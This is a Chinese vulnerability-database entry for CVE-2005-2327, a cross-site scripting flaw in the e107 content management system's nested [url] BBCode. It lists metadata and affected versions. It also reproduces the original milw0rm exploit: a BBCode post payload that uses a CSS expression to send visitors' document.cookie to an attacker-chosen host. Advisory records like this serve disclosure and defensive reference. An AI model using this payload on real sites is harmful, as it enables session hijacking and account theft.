e107 nested [url] BBCode 跨站脚本漏洞

e107 nested [url] BBCode 跨站脚本漏洞

漏洞ID 1108934 漏洞类型 跨站脚本
发布时间 2005-07-14 更新时间 2005-07-20
图片[1]-e107 nested [url] BBCode 跨站脚本漏洞-安全小百科CVE编号 CVE-2005-2327
图片[2]-e107 nested [url] BBCode 跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200507-241
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/1106
https://www.securityfocus.com/bid/89028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-241
|漏洞详情
e107是用PHP编写的内容管理系统,使用MYSQL数据库进行内容存储。e1070.617及更早版本存在跨站脚本攻击(XSS)漏洞。远程攻击者可以通过nested[url]BBCode标记注入任意Web脚本或HTML。
|漏洞EXP
/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.

Credits to Nick Griffin.

/str0ke
*/

[color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


# milw0rm.com [2005-07-14]
|受影响的产品
e107 E107 5.4 Beta6

e107 E107 5.4 Beta5

e107 E107 5.4 Beta4

e107 E107 5.4 Beta3

e107 E107 5.4 Beta1

e107 E107 5.3 Beta2

e107 E107 5.3 Beta

|参考资料

来源:SECTRACK
名称:1014513
链接:http://securitytracker.com/id?1014513
来源:MILW0RM
名称:1106
链接:http://milw0rm.com/exploits/1106

相关推荐: Oracle Reports Server DESName 文件覆盖漏洞

Oracle Reports Server DESName 文件覆盖漏洞 漏洞ID 1198417 漏洞类型 路径遍历 发布时间 2005-07-19 更新时间 2005-07-19 CVE编号 CVE-2005-2371 CNNVD-ID CNNVD-200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享